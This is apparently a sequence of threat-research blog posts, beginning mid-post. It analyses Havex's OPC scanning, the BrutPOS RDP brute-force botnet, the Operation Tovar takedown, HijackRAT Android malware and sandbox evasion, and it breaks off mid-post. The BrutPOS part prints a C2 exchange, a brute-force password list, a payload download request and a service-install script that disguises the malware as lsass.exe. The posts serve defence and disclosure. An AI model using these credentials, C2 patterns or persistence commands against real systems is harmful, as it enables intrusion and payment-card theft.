When executing PE.dll, all of the OPC server data output is first saved as %TEMP%\[random].tmp.dat. The results of a capability scan of an OPC server is stored in %TEMP%\OPCServer[random].txt. Files are not encrypted or deleted once the scanning process is complete.

Once the scanning completes, the log is deleted and the contents are encrypted and stored into a file named %TEMP%\[random].tmp.yls.  The encryption process uses an RSA public key obtained from the PE resource TYU.  The RSA key is used to protect a randomly generated 168-bit 3DES key that is used to encrypt the contents of the log.

The TYU resource is BZip2 compressed and XORed with the string “1312312”.  A decoded configuration for 6BFC42F7CB1364EF0BFD749776AC6D38 is included in the figure below:

Screen Shot 2014-07-17 at 12.27.24 PM

Figure 7: Sample decoded TYU resource

The 4409de445240923e05c5fa6fb4204 value is believed to be an RSA key identifier. The AASp1… value is the Base64 encoded RSA key.

A sample encrypted log file (%TEMP%\[random].tmp.yls) is below.














00000000  32 39 0a 66 00 66 00 30  00 30 00 66 00 66 00 30 29.f.f.0.0.f.f.000000010  00 30 00 66 00 66 00 30  00 30 00 66 00 66 00 30 .0.f.f.0.0.f.f.000000020  00 30 00 66 00 66 00 30  00 30 00 66 00 66 00 30 .0.f.f.0.0.f.f.000000030  00 30 00 66 00 66 00 30  00 30 00 66 00 37 39 36 .0.f.f.0.0.f.79600000040  0a 31 32 38 0a 96 26 cc  34 93 a5 4a 09 09 17 d3 .128..&.4..J....00000050  e0 bb 15 90 e8 5d cb 01  c0 33 c1 a4 41 72 5f a5 .....]...3..Ar_.00000060  13 43 69 62 cf a3 80 e3  6f ce 2f 95 d1 38 0f f2 .Cib....o./..8..00000070  56 b1 f9 5e 1d e1 43 92  61 f8 60 1d 06 04 ad f9 V..^..C.a.`.....00000080  66 98 1f eb e9 4c d3 cb  ee 4a 39 75 31 54 b8 02 f....L...J9u1T..00000090  b5 b6 4a 3c e3 77 26 6d  93 b9 66 45 4a 44 f7 a2 ..J<.w&m..fEJD..000000A0  08 6a 22 89 b7 d3 72 d4  1f 8d b6 80 2b d2 99 5d .j"...r.....+..]000000B0  61 87 c1 0c 47 27 6a 61  fc c5 ee 41 a5 ae 89 c3 a...G'ja...A....000000C0  9e 00 54 b9 46 b8 88 72  94 a3 95 c8 8e 5d fe 23 ..T.F..r.....].#000000D0  2d fb 48 85 d5 31 c7 65  f1 c4 47 75 6f 77 03 6b -.H..1.e..Guow.k


--Truncated--Probable Key Identifierff00ff00ff00ff00ff00ff00ff00fRSA Encrypted 3DES Key5A EB 13 80 FE A6 B9 A9 8A 0F 41…The 3DES key will be the last 24 bytes of the decrypted result.3DES IV88 72  94 a3 95 c8 8e 5d3DES Encrypted Logfe 23 2d fb 48 85 d5 31 c7 65 f1…

Figure 8: Sample encrypted .yls file


When executing PE.dll against the Arduino OPC server, we observe interesting responses within the plaintext %TEMP%\[random].tmp.dat:



Screen Shot 2014-07-17 at 12.41.27 PM



Figure 9: Sample scan log

The contents of the tmp.dat file are the results of the scan of the network devices, looking for OPC servers. These are not the in-depth results of the OPC servers themselves, and only perform the initial scanning.

The particular Havex sample in question also enumerates OPC tags and fully interrogates the OPC servers identified within %TEMP%\[random].tmp.dat. The particular fields queried are: server state, tag name, type, access, and id. The contents of a sample %TEMP%\OPCServer[random].txt can be found below:



Screen Shot 2014-07-17 at 12.43.48 PM



Figure 10: Contents of OPCServer[Random].txt OPC interrogation

While we don’t have a particular case study to prove the attacker’s next steps, it is likely after these files are created and saved, they will be exfiltrated to a command and control server for further processing.


Part of threat intelligence requires understanding all parts of a particular threat. This is why we took a closer look at the OPC functionality of this particular Havex variant.  We don’t have any case study showcasing why the OPC modules were included, and this is the first “in the wild” sample using OPC scanning. It is possible that these attackers could have used this malware as a testing ground for future utilization, however.

Since ICS networks typically don’t have a high-level of visibility into the environment, there are several ways to help minimize some of the risks associated with a threat like Havex. First, ICS environments need to have the ability to perform full packet capture ability. This gives incident responders and engineers better visibility should an incident occur.

Also, having mature incident processes for your ICS environment is important. Being able to have security engineers that also understand ICS environments during an incident is paramount. Finally, having trained professionals consistently perform security checks on ICS environments is helpful. This ensures standard sets of security protocols and best practices are followed within a highly secure environment.

We hope that this information will further educate industrial control systems owners and the security community about how the OPC functionality of this threat works and serves as the foundation for more investigation. Still, lots of questions remain about this component of Havex. What is the attack path? Who is behind it? What is their intention? We’re continuing to track this specific threat and will provide further updates as this new tactic unfolds.


We would like to thank Josh Homan for his help and support.

Related MD5s





BrutPOS: RDP Bruteforcing Botnet Targeting POS Systems

There have been an increasing number of headlines about breaches at retailers in which attackers have made off with credit card data after compromising point-of-sale (POS) terminals. However, what is not commonly discussed is the fact that one third of these breaches are a result of weak default passwords in the remote administration software that is typically installed on these systems. [1] While advanced exploits generate a lot of interest, sometimes it’s defending the simple attacks that can keep your company from the headlines.

In this report, we document a botnet that we call BrutPOS which uses thousands of compromised computers to scan specified IP address ranges for RDP servers that have weak or default passwords in an effort to locate vulnerable POS systems. [2]


It is unclear exactly how the BrutPOS malware is being propagated. We have found that the malware is being distributed (along with a considerable amount of otherwise unrelated malware) by the site destre45[.]com. The attackers may have used a distribution service provided by other cybercriminals.

When executed, the malware copies itself to:


It modifies the Windows Registry (HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Run_) so that it will be restarted after a reboot.

The malware connects to the command and control server (C2) to report its status and receives a list of usernames/passwords and IP addresses to begin scanning.


POST /brut.loc/www/cmd.php HTTP/1.1

Content-type: multipart/form-data, boundary=XyEgoZ17

Cache-Control: no-cache

Accept: */*

Accept-Encoding: identity

Connection: Keep-Alive

Accept-Language: ru-RU,en,*

User-Agent: Browser


Content-Length: 212


content-disposition: form-data; name="data"

{ "bad" : 0, "bruting" : false, "checked" : 1, "done" : true, "errors" : 0, "good" : 0, "goodslist" : "", "pps" : 0.0, "threads" : 5, "v" : "0.0.0" }

HTTP/1.1 200 OK

Date: Fri, 20 Jun 2014 13:22:53 GMT

Server: Apache/2.2.22 (@RELEASE@)

X-Powered-By: PHP/5.3.3

Set-Cookie: PHPSESSID=o68hcjj8lhkbprfbdkbj50lrr0; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Content-Length: 2056

Connection: close

Content-Type: text/html; charset=UTF-8

{"passwords":"backupexec\r\nbackup\r\npassword\r\nPassword1\r\nPassw0rd\r\nPa$$w0rd1\r\nPass@word\r\nPassword\r\nclient\r\nP@ssw0rd\r\np@$$w0rd\r\npassw0rd\r\np@ssw0rd\r\npa$$w0rd","logins":"backupexec\r\nbackup\r\ndatacard","servers":"[IP ADDRESSES REDACTED]","botstart":"1","stamp":1308301912,"newthreads":5,"interval":50}

The infected system begins to make connections to port 3389; if the port is open it adds the IP to a list of servers to be brute forced with the supplied credentials. If the infected system is able to successfully brute force an RDP server, it reports back with credentials.

In total we found five C2 servers used by the BrutPOS botnet. Three of these servers are located on the same network in Russia; one of them is located in Iran. Only two of these servers remain active at this time.

C2 Country Network Status Russia Russia THEFIRST-NET THEFIRST-NET Active Active Russia Russia THEFIRST-NET THEFIRST-NET Active Active Iran Iran BSG BSG Inactive Inactive Russia Russia THEFIRST-NET THEFIRST-NET Inactive Inactive Germany Germany DE-23MEDIA DE-23MEDIA Inactive Inactive

Based on the compile times of the samples we analyzed that connect to this C2 infrastructure, this botnet was active as of February 2014.

However, one of the active C2 servers was setup on May 28 and we believe that the second was setup in early June. We were able to recover information from these two C2 servers in mid-June that allowed us to gain a better understanding of this botnet.

The attackers are able to control the botnet from a web-based administration panel. This panel provides a statistical overview of the botnet.


The botnet had a total of 5622 compromised computers under its control, however, only a fraction of those systems are active at any given time (179 were active when we last checked). This page also displays the “current version” of the malware and if an infected system checking in reports an earlier version a new executable will be pushed down to it.


The attackers are able to view the details of the infected systems under their control including the IP address and geographic location as well as status of the infected systems’ brute forcing activities (bad / good / errors / threads / version) and the timestamp of the last connection to the C2. The attackers may also specify commands such as “reload” and “delete”.

Based on the IP addresses on this page, there are 5622 infected systems spread across 119 countries.

Country Count Percentage
Russia Russia 881 881 15.67% 15.67%
India India 756 756 13.45% 13.45%
Vietnam Vietnam 422 422 7.51% 7.51%
Iran Iran 341 341 6.07% 6.07%
Taiwan Taiwan 232 232 4.13% 4.13%
Ukraine Ukraine 151 151 2.69% 2.69%
Turkey Turkey 139 139 2.47% 2.47%
Serbia Serbia 115 115 2.05% 2.05%
Egypt Egypt 110 110 1.96% 1.96%
Mexico Mexico 106 106 1.89% 1.89%


This page lists the ranges of IP addresses that the attackers can specify to be scanned for RDP access and brute forced.


In total, the attackers specified 57 IP address ranges the majority of which (32) are located in the U.S.


The attackers can specify the user names and passwords that the infected systems use to brute force available RDP servers. Some of the usernames and password indicate that the attackers are looking for specific brands of POS systems (such as Micros). [3]

Usernames Passwords
admin admin Admin Admin
administrator administrator admin admin
backup backup Administrat0r Administrat0r
backupexec backupexec Administrator Administrator
data data administrator administrator
datacard datacard backup backup
manager manager backupexec backupexec
micros micros client client
microssvc microssvc client1 client1
pos pos datacard datacard
@dm1n @dm1n
@dmin @dmin
micros micros
p0s p0s
Passw0rd Passw0rd
Passw0rd1 Passw0rd1
Password Password
Pass@word Pass@word
password password
Password1 Password1
Pa$$w0rd1 Pa$$w0rd1
Pa$$word Pa$$word
pa$$word pa$$word
pos pos
P@ssw0rd P@ssw0rd
p@ssword p@ssword
p@ssword1 p@ssword1
p@$$w0rd p@$$w0rd



When an infected system reports back a successful RDP login, the attackers store the username/password and IP address of the RDP server as well as the IP address of the infected system that successfully brute forced it.


Of the 60 “good” RDP servers listed by the attackers the majority (51) are located in the U.S. The most common username was “administrator” (36) and the most common passwords were “pos” (12) and “Password1” (12).

Payment Card Theft

During our investigation, we discovered another executable that is potentially run on systems once credentials are obtained (e.g. 4aed6a5897e9030f09f13f3c51668e92). This variant is intended to extract payment card information stored within running processes. It has two distinct code paths depending on its ability to get debug permissions by calling RtlAdjustPrivilage(0x14,1,0…). This may be an attempt to identify a POS configuration. If it succeeds in getting debug permissions, it downloads the executable and executes it:


GET /brut.loc/www/bin/1.exe HTTP/1.1

Accept-Encoding: gzip

Connection: Keep-Alive

Accept-Language: ru-RU,en,*

User-Agent: Browser



If the malware fails to get debug permissions, it copies itself to %WINDIR%\lsass.exe and installs itself as a service. The following script is used to create and start the service:


sc create winserv binpath= C:\WINDOWS\lsass.exe type= own start= auto

sc start winserv

del 1.bat


When running as a service, the program scans the memory of all processes with the exception of csrss.exe and conhost.exe for potential payment card information. Candidates are verified using the Luhn checksum and saved to winsrv.sys. It uploads ‘winsrv.sys’ using FTP to the server

Before connecting to the FTP server, the implant connects to smtp[.]gmail[.]com on port 25 and obtains the victim’s external IP address from the EHLO response. winsrv.sys is uploaded to the FTP serving using a filename consisting of a capital character followed by the IP address. The capital character prefixed to the filename is initialized to ‘A’ and is incremented through ‘Z’ for each new file. If the IP address isn’t obtained from smtp[.]gmail[.]com, a random four digit number is generated.


While there is insufficient information to determine attribution, there is some information which indicates that the attackers are in Eastern Europe, probably Russia or Ukraine. In addition to the Russian language interface, we recovered web server logs and parsed out the six IP addresses that used the administration interface.

Two of the IP addresses were from PEOPLE-NET, an ISP in Ukraine. In both cases the “User-Agent” indicates that the requests were coming from an Alcatel mobile phone running Android:

"Mozilla/5.0 (Linux; Android 4.1.1; ALCATEL ONE TOUCH 5020D Build/JRO03C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Mobile Safari/537.36 OPR/19.0.1340.69721"

Another Ukraine IP address, from the UKRTELNET-ADSL ISP, was also used. However, the “User-Agent” in this case was FireFox:

"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0"

There were also connections from an IP range in Russia assigned to the network “Macroregional_South” in Volvograd.

In addition to these connections there were also connections from the U.K. and France, however, these connections were made using VPN services provided by and


In order to understand the attacker’s intentions, we decided to setup a Windows 2008 R2 Server with POS software and allow the attackers to compromise it. In addition to POS software, we also put documents with fake credit card information on the Desktop. By mimicking the traffic generated by the infected systems under the attackers control, we were able send a username and password combination of “micros” and “admin” to the C2. We then waited for the attackers to connect.

We saw the attackers connect to the RDP instance 27 minutes after the fake username and password combination were sent to the C2. The attackers connected from three IP addresses. One of the IP addresses was in the same Ukrainian IP address range assigned to PEOPLE-NET that we saw in the C2 logs. Another was the same VPN based in the UK, while the third was assigned to INETHN in Honduras.

After connecting, the attackers immediately opened the document containing fake credit card information, then exited the system shortly after. The second access attempt occurred 4 minutes later, with little activity. The third access occurred 18 minutes later. The attackers, on the third access, then attempted to open the POS software; which was unsuccessful. The fourth access happened two minutes later, with very little activity. The fifth and final access happened approximately 4 hours later, which led the attackers to format the drive, thus attempting to wipe data trails.


POS systems remain a high priority target for cybercriminals. Based on a simple scanning attack, the attackers in this case were able leverage their botnet of over 5000 machines in order to acquire access to 60 systems in two weeks.

While new malware and more advanced attacks are taking place, standard attacks against weak passwords for remote administration tools presents a significant threat.



2. The BrutPOS malware was initially identified in March 2014 but the full scope of the botnet was still unknown at that time. and

3. Micros sells POS systems for the retail and hospitality industries


We would like to thank Josh Gomez for his help and support.


4c3d65c1d8e1d7a2815c0031be41efc7: BrutePOS_Brute

7391ff6f34f79df0ec7571f7afbf8f7a: BrutePOS_Brute

280d920531ba67d8fd81350877914985: BrutePOS_Brute

96487eb38687e84405f045f7ad8a115c: BrutePOS_Brute

c1fab4a0b7f4404baf8eab4d58b1f821: BrutePOS_Brute

6bcff459fbca8a64f1fd74be433e2450: BrutePOS_Brute

daae858fe34dcf263ef6230d887b111d: BrutePOS_Brute

31bd8dd48ac0de3d4da340bf29f4d280: BrutePOS_Brute

0f2266f63c06c0fee3ff999936c7c10a: BrutePOS_Brute

4d4fd96fabb1c525eaeeae8f2652ffa6: BrutePOS_Brute

da6d727ddf096b6654406487bf22d26c: BrutePOS_Brute

fd58144a4cd354bfd09719ac2ccd3511: BrutePOS_Brute

e38e42f20e027389a86d6a5816a6d8f8: BrutePOS_Brute

08863d484b1ebe6359144c9a8d8027c0: BrutePOS_Brute

4ab3a6394a3a1860a6c52cf92d7f7560: BrutePOS_Brute

0e58848506a525c755cb0dad397c1c44: BrutePOS_Brute

60c16d8596063f6ee0eae579f201ae04: BrutePOS_Brute

b2d4fb4977630e68107ee87299a714e6: BrutePOS_Brute

68ba1afd4585b9355cf7009f4604a208: BrutePOS_Brute

9d3d769d3feea92fd4794fc3c59e32df: BrutePOS_Brute

b63581fcf0ff86bb771c3c33205c78ca: BrutePOS_Brute

18eba6f28ab6c088d9fc22b4cc154a77: BrutePOS_Brute

4802539350908fd447a5c3ae3e966be0: BrutePOS_Brute

cbbb68f6d8eda1071078a02fd79ed3ec: BrutePOS_Brute

8ba3c7ccd0a61d5c9a8b94a71ce06328: BrutePOS_Brute

9b8de98badede7f837a34e318b12d842: BrutePOS_Brute

78f4a157db42321e8f61294bb39d7a74: BrutePOS_FTP_Exfil

f36889f30b62a7524bafc766ed78b329: BrutePOS_FTP_Exfil

95b13cd79621931288bd8a8614c8483f: BrutePOS_FTP_Exfil

4aed6a5897e9030f09f13f3c51668e92: BrutePOS_FTP_Exfil

06d8d8e18b91f301ac3fe6fa45ab7b53: BrutePOS_FTP_Exfil

faddbf92ab35e7c3194af4e7a689897c: BrutePOS_FTP_Exfil

Operation Tovar: The Latest Attempt to Eliminate Key Botnets

Coordinated botnet disruptions have increased in pace and popularity over the last few years as more private companies work with international law enforcement agencies to combat malware infections on a grand scale. Operation Tovar, announced on June 2 2014, is the latest to make headlines. The target of the investigation, Evgeniy Mikhailovich Bogachev, was indicted by the Department of Justice and is wanted by the FBI for his role as alleged leader of the Gameover ZeuS and CryptoLocker botnets. Four other defendants were indicted using their pseudonyms. Though Bogachev’s current activities aren’t known, the Operation Tovar task force has maintained control of the botnet infrastructure and remediation efforts are ongoing.

While new malware strains are released with increasing frequency, it’s easy to forget why Gameover and CryptoLocker are worthwhile targets for takedown operations. Both offered more advanced features than their peers and typified the increasingly sophisticated cybercriminal enterprises behind botnets.

Gameover ZeuS

Since the ZeuS source code was released in 2011, several new variants have appeared in the wild. Citadel, KINS, ICE IX, and Gameover have all improved upon the basic ZeuS model by introducing new features, using better encryption, and modifying command and control (C2) communication methods.

Gameover uses a peer-to-peer (P2P) system for C2 communication. Though other P2P botnets such as Kelihos exist, Gameover is notable for its use of proxy nodes to introduce complexity into the standard P2P infrastructure. These proxy nodes are specific machines designated as relay points through which the botnet operators send commands and receive stolen information. This minimizes the number of systems that actually communicate with C2 servers. C2 commands are signed using RSA-2048 and encrypted with RC4 making it very difficult to tamper with the botnet.

Additionally, Gameover maintains a failsafe mechanism: a domain generation algorithm (DGA) that produces 1,000 domains each week. This feature enables the operators to maintain control of their botnet even if the P2P infrastructure is compromised. The DGA produces long, nonsensical strings at one of six top-level domains: .com, .net, .org, .biz, .info, and .ru that can be registered and used to send commands to the botnet.

ZeuS and all its variants are information-stealing trojans. We refer to them as banking trojans because that’s where they excel and Gameover is no exception. Gameover is able to trick the user into handing over personal information and can even defeat two-factor authentication. It accomplishes this by injecting custom code into the browser when a victim visits certain websites. Gameover’s arsenal of bank account takeover tools includes 1,500 web injections that were custom-made to target the websites of more than 700 financial institutions worldwide.

In addition to its exceptional abilities as a banking trojan, Gameover is capable of a wider variety of data theft activities. An Operation Tovar task force member, speaking to Brian Krebs on the condition of anonymity, said they have evidence of additional harvested data and that Gameover targeted proprietary information.


Not content with merely engaging in widespread banking credential and information theft, the Gameover criminal operators decided to maximize returns by infecting systems with CryptoLocker. It is a type of ransomware that encrypts the files on infected machines and then demands a ransom of hundreds of dollars in order to receive a decryption key. Typically, victims were given 72 hours to pay the ransom in bitcoins or risk losing their data.

Unwilling to miss out on any opportunity to generate revenue, the criminal operators set up a website to assist victims in paying the ransom in bitcoins. Through this website, victims could complete the transaction and track the status of their “order” – the ransom payment in exchange for the decryption key. Some victims, unwilling or unable to pay the ransom, missed the 72-hour deadline only to see the ransom demand increase fivefold.

Law enforcement officials discouraged people from paying the ransom since it would fund a criminal organization, but without back ups many victims had little choice but to pay. A US police department paid $750 for two Bitcoins as ransom after CryptoLocker was installed on a system used for police reports and booking photos. CryptoLocker encrypts files using asymmetric encryption, making use of a public and a private key. Without the private key, located on the criminals’ servers, infected files probably cannot be decrypted.

The Target

Operation Tovar’s investigation began with a server in the UK. A trail of wire transfers, money mules, criminal servers, and at least one confidential source led investigators to Bogachev. He is a Russian citizen wanted on charges of conspiracy to participate in racketeering activity, bank fraud, conspiracy to violate the Computer Fraud and Abuse Act, conspiracy to violate the Identity Theft and Assumption Deterrence Act, aggravated identity theft, conspiracy, computer fraud, wire fraud, and money laundering. The FBI estimates the financial toll of Gameover at over $100 million and another estimate is that more than $27 million in ransom payments were made in the first two months of CryptoLocker’s distribution.

Obtaining an indictment against a Russian national who will likely never be extradited to the United States isn’t sufficient to put an end to a criminal organization. In 2011, Russian citizen Aleksandr Andreevich Panin was indicted in the US on 23 counts related to the development and distribution of SpyEye but was not arrested until 2013 when he flew through Hartsfield-Jackson Atlanta International Airport. The Russian government, in a travel warning to its citizens, specifically mentions Panin and recommends that Russians facing legal action in the US should refrain from travelling internationally.

The Takeover

Drawing on the technical expertise of its members, the Operation Tovar task force was able to exploit flaws in the design of Gameover’s P2P network to manipulate the peer list and redirect traffic to nodes under its control. The specific technical details have not been released to the public in order to prevent the criminals from regaining control.

Gameover’s failsafe mechanism, the DGA that was supposed to have allowed the criminals to maintain control in the event of a P2P disruption, was reverse engineered by task force members. The FBI then obtained a restraining order to redirect any attempts to register those domains to a government-run server. Furthermore, US service providers are required to block connections to the Russian .ru domains generated by the DGA since the US has no jurisdiction to prevent their registration.

CryptoLocker also used a DGA for determining C2 locations. The algorithm was reverse engineered and the C2 servers were identified and seized by the Operation Tovar task force. Due to the use of an asymmetric key algorithm, CryptoLocker victims whose files remain encrypted currently have no avenue of remediation.

Operation Tovar’s success can be measured by two factors: (1) Have the criminals regained control of their botnets and (2) Is the malware being removed from infected machines? While we can’t say for certain that the people responsible for Gameover and CryptoLocker have ceased all criminal activity, they have not regained control of the network disrupted by Operation Tovar. Based on this fact alone, the task force should be commended. Successful botnet disruptions are very challenging. Attempted takeovers over Kelihos have been undone after only two weeks.

The remediation of infected machines is an even more difficult task. US-CERT has published a list of recommended actions and resources, and a number of the private companies involved in Operation Tovar have released scanning tools. The onus remains on individuals and organizations to use these resources to determine if they are infected and take the appropriate steps to remediate the problem. Statistics published by The Shadowserver Foundation show the number of machines infected with Gameover has remained essentially flat since the takeover. There are simply not enough people taking advantage of the resources available to remediate their systems.


The task force has taken control of the C2 network and now some people may believe that the malware is neutered and no further action is required. It is important to remember that any malware is unauthorized code running on a computer. The integrity of the system is still compromised, regardless of who is in control of the botnet.

Announcing the FLARE Team and The FLARE On Challenge

I would like to announce the formation of the FireEye Labs Advanced Reverse Engineering (FLARE) team. As part of FireEye Labs, the focus of this team is to support all of FireEye and Mandiant from a reverse engineering standpoint. Many FireEye groups have reversing engineering needs: Global Services discovers malware during incident response, Managed Defense constantly discovers threats on monitored client networks, and Products benefit from in-depth reversing to help improve detection capabilities.

We primarily focus on malware analysis, but we also perform red-teaming of software and organizations, and we develop tools to assist reverse engineering. Our research and tools assist with automatic malware triage to quickly get initial results out to incident responders in the field. Auto-unpackers unravel obfuscated samples without the need for an analyst. Automatic clustering and classifying samples helps identify if a binary is good or bad and whether we have analyzed it before. We develop reverse engineering scripts for IDA Pro and systems that help us quickly share our analysis results. We also write scripts that can help incident responders decrypt and interpret malware network traffic and host artifacts.

This elite technical enclave of reversers, malware analysts, researchers, and teachers, will team up with our FireEye Labs peers to help bring the best detection to our customers and promote knowledge sharing with the security research community. We’ll continue to provide technical training on malware analysis privately and at conferences like Black Hat. Look for us to present webinars on malware analysis and a blog series of scripts for IDA Pro to aid reverse engineering of malware.

The Challenge

To commemorate our launch, the FLARE team is hosting a challenge for all reverse engineers and malware analysts. We invite you to compete and test your skills. The challenge runs the gamut of skills we believe are necessary to succeed on the FLARE team. We invite everyone who is interested to solve the challenge and get their just reward!

The puzzles were developed by Richard Wartell, a reverse engineer with a PhD in “IDA Pro” (actually Computer Science, but his thesis used IDA Pro) from the University of Texas at Dallas where he worked on binary rewriting techniques for the x86 instruction set. He recently presented this work at the REcon conference in Montreal. At Mandiant Richard focused on incident response, but now on the FLARE team he reverse engineers malware, teaches malware classes, and helps develop our auto-unpacking technology.

As reverse engineers we’ve seen a variety of anti-reverse engineering techniques. Oftentimes the armoring malware authors employ is sophisticated and requires time to unravel. Sometimes it is misguided and easily circumvented.

Writing these binary puzzles has given us a chance to recreate some of the sophisticated (and sometimes ridiculous) techniques we see. The seven puzzles start with basic skills and escalate quickly to more difficult reversing tasks. At FLARE we have to deal with whatever challenges come our way, so the challenge reflects this. If you take on the challenge you might see malicious PDFs, .NET binaries, obfuscated PHP, Javascript, x86, x64, PE, ELF, Mach-O, and so on.

And after completing the final challenge, you’ll win a prize and be contacted by a FLARE team member. The full details can be found at:

So on behalf of the FLARE team, I say Happy Reversing!

The Service You Can’t Refuse: A Secluded HijackRAT

In Android world, sometimes you can’t stop malware from “serving” you, especially when the “service” is actually a malicious Android class running in the background and controlled by a remote access tool (RAT). Recently, FireEye mobile security researchers have discovered such a malware that pretends to be a “Google Service Framework” and kills an anti-virus application as well as takes other malicious actions.

In the past, we’ve seen Android malware that execute privacy leakage, banking credential theft, or remote access separately, but this sample takes Android malware to a new level by combining all of those activities into one app. In addition, we found the hacker has designed a framework to conduct bank hijacking and is actively developing towards this goal. We suspect in the near future there will be a batch of bank hijacking malware once the framework is completed. Right now, eight Korean banks are recognized by the attacker, yet the hacker can quickly expand to new banks with just 30 minutes of work.

Although the IP addresses we have captured don’t reveal who the attacker is, as the computer of the IP might be a victim as well, we have found from the UI that both the malware developer and the victims are Korean speakers.

[caption id="attachment_5810" align="alignnone" width="545"]Fig. 1. The structure of the HijackRAT malware. Fig. 1. The structure of the HijackRAT malware.[/caption]

The package name of this new RAT malware is “com.ll” and appears as “Google Service Framework” with the default Android icon. Android users can’t remove the app unless they deactivate its administrative privileges in “Settings.” So far, the Virus Total score of the sample is only five positive detections out of 54 AV vendors [1]. Such new malware is published quickly partly because the CNC server, which the hacker uses, changes so rapidly.

[caption id="attachment_5812" align="alignnone" width="548"] Fig. 2. The Virus Total detection of the malware sample. [1][/caption] 

[caption id="attachment_5813" align="alignnone" width="549"] Fig. 3. The fake “Google Service Framework” icon in home screen.[/caption]

A few seconds after the malicious app is installed, the “Google Services” icon appears on the home screen. When the icon is clicked, the app asks for administrative privilege. Once activated, the uninstallation option is disabled and a new service named “GS” is started as shown below. The icon will show "App isn't installed." when the user tries to click it again and removes itself from the home screen.

[caption id="attachment_5815" align="alignnone" width="548"]Fig. 4. The background service of the malware. Fig. 4. The background service of the malware.[/caption]

The malware has plenty of malicious actions, which the RAT can command, as shown below.


Within a few minutes, the app connects with the CNC server and begins to receive a task list from it:


The content is encoded by Base64 RFC 2045. It is a JSONObject with content: {"task": {"0": 0}}, when decoded. The server IP,, is located in Hong Kong. We cannot tell if it’s the hacker’s IP or a victim IP controlled by the RAT, but the URL is named after the device ID and the UUID generated by the CNC server.

The code below shows how the URL of the HTTP GET request is constructed:



The task list shown above will trigger the first malicious action of “Upload Phone Detail.” When executed, the user’s private information will be uploaded to the server using HTTP POST request. The information contains phone number, device ID, and contact lists as shown below in the network packet of the request:


When decoded, the content in the red and blue part of the PCap are shown below respectively:

1. The red part:


2. The blue part:


The contact list shown above is already highly sensitive, yet, if the user has installed some banking applications, the malware will scan for them too.

In a testing device, we installed the eight Korean bank apps as shown below:

[caption id="attachment_5822" align="alignnone" width="274"]Fig. 5. The eight banking apps. Fig. 5. The eight banking apps.[/caption]

When this was done,  we found the value of “banklist” in the PCap is no longer listed as N/A anymore:


The “banklist” entry in the PCap is filled with the short names of the banks that we installed. There is a map of the short names and package names of the eight banking apps installed on the phone:


The map of the banks is stored in a database and used in another malicious action controlled by the CNC server too.


In this malicious action, the CNC server sends a command to replace the existing bank apps. The eight banking apps require the installation of “com.ahnlab.v3mobileplus,” which is a popular anti-virus application available on Google Play. In order evade any detections, the malware kills the anti-virus application before manipulating the bank apps. In the code as shown below, Conf.LV is the “com.ahnlab.v3mobileplus” being killed.


Then, the malware app parses the banking apps that the user has installed on the Android device and stores them in the database under /data/data/com.ll/database/simple_pref. The red block below shows the bank list stored in the database:


Once the corresponding command is sent from the RAT, the resolvePopWindow() method will be called and the device will pop a Window with the message: “The new version has been released. Please use after reinstallation.”


The malware will then try to download an app, named after “update” and the bank’s short name from the CNC server, simultaneously uninstalling the real, original bank app.


In the code shown above, “mpath” contains the CNC server IP ( and path (determined by the RAT); “mbkname” is the bank name retrieved from the SQL lite database. The fake APK (e.g. "updateBH.apk") is downloaded from the CNC server, however we don’t know what the fake apps look like because during the research the command for this malicious action was not executed from the RAT. Yet the source of the “update*.apk” is definitely not certified by the banks and might be harmful to the Android user.


When the command to “update” is sent from the RAT, a similar app – “update.apk” is downloaded from the CNC server and installed in the Android phone:



When the command to upload SMS is received from the RAT, the SMS of the Android phone will be uploaded to the CNC server. The SMS has been stored in the database once received:



Then the SMS is read from the database and uploaded to the CNC server once the command is received:



Similarly, when the sending SMS command is received, the contact list is sent through SMS.



Interesting enough, we found a partially finished method called “Bank Hijack.” The code below partially shows how the BankHijack method works. The malware reads the short bank name, e.g. “NH”, and then keeps installing the updateNH.apk from the CNC server until it’s of the newest version.


So far the part after the installation of the fake app is not finished yet. We believe the hacker is having some problems finishing the function temporarily.


As shown above, the hacker has designed and prepared for the framework of a more malicious command from the CNC server once the hijack methods are finished. Given the unique nature of how this app works, including its ability to pull down multiple levels of personal information and impersonate banking apps, a more robust mobile banking threat could be on the horizon.








Turing Test in Reverse: New Sandbox-Evasion Techniques Seek Human Interaction

Last year, we published a paper titled Hot Knives Through Butter, Evading File-Based Sandboxes.  In this paper, we explained many sandbox evasion methods--and today's blog post adds to our growing catalog.

In the past, for example, we detailed the inner workings of a Trojan we dubbed UpClicker. The malware was notable for a then-novel technique to evade automated dynamic analysis systems (better known as sandboxes). UpClicker activates only when the left mouse button is clicked and released — a sign that it is running on a real, live, human-controlled PC rather than within an automated sandbox.

If the malware determines it is running in a sandbox, it lies dormant so that the sandbox doesn’t observe any suspicious behavior. Once the sandbox incorrectly clears it as a benign file, UpClicker goes on to a real computer to do its dirty work.

Last year, our colleague Rong Hwa shared the technical details of another sandbox-detecting Trojan called  BaneChant. Like UpClicker, BaneChant uses human interaction to ascertain whether it is running in a virtual-machine environment, activating only after it detects more than three left clicks.

Since then, we’ve seen a spate of new malware that pushes the concept further. The newest sandbox-evading malware counters recent efforts to mimic human behavior in sandbox environments.

This blog post describes three tactics that FireEye has discovered in recent attacks.

Sandbox evasion: a primer

Most sandbox-evasion techniques fall into one of three categories:

Human interaction. This category includes malware that requires certain actions on the user’s part (a sign that the malicious code is running on a real-live PC rather than within an automated sandbox).

Configuration specific. Malware in this category takes advantage of the inherent constraints of file-based sandboxes. For example, knowing that a sandbox can spend, say, five minutes running suspicious code for analysis, malware creators can create code that automatically lies dormant for a longer period. If the code is still running after that, it’s probably not in a sandbox.

Environment specific. In this category, malware checks for telltale signs that its code is running in widely used VM environments. It checks for obscure files unique to VMware, for instance, or VM-specific hardware drivers.

The first category of sandbox evasion is one of the trickiest to counter. To fool sandbox-detecting malware, some vendors now simulate mouse movement and clicks in their virtual-machine environments to mimic human activity. But malware authors are upping the ante with even more sophisticated sandbox detection and evasion techniques.

To scroll is human

One malware we discovered lies dormant until the user scrolls to the second page of a Rich Text Format (RTF) document. So simulating human interaction with random or preprogrammed mouse movements isn’t enough to activate its malicious behavior.

Here’s how it works:

